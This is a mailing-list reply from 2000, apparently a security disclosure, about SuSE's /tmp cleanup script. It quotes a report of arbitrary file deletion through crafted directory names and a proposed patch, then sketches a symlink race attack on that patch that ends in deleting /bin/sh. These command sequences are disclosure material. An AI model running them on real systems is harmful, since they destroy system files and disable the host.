On Fri, 21 Apr 2000, [ISO-8859-1] Peter Münster wrote:
> If MAX_DAYS_IN_TMP > 0 in /etc/rc.config on a SuSE-Linux system, a local
> user can delete arbitrary files by doing some commands like these:
> mkdir -p "/tmp/hhh /somedirectory"
> touch -t some-early-date "/tmp/hhh /somedirectory/somefile"
> sleep 1d
...
> Here a possible patch for suse-package aaa_base-2000.1.3-0:
...
> + find $TMP_DIR/. $OMIT ! -type d \
> + -atime +$MAX_DAYS_IN_TMP -exec rm -f '{}' ';'
> + find $TMP_DIR/. $OMIT -depth -type d -empty -mindepth 1 \
> + -mtime +$MAX_DAYS_IN_TMP -exec rmdir '{}' ';'
mkdir -p /tmp/somedirectory/{_junk,bin}
fill_with_lots_of_junk_to_slow_find_down /tmp/somedirectory/_junk
find /tmp/somedirectory -type f | xargs touch -t some-early-date
touch -t some-early-date /tmp/somedirectory/bin/sh
wait_until_aaa_base_starts_searching /tmp/somedirectory/_junk
mv /tmp/somedirectory /tmp/somedirectory2
ln -s / /tmp/somedirectory
watch /bin/sh disappear...this will teach you not to use find and
rm to clean /tmp :)
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
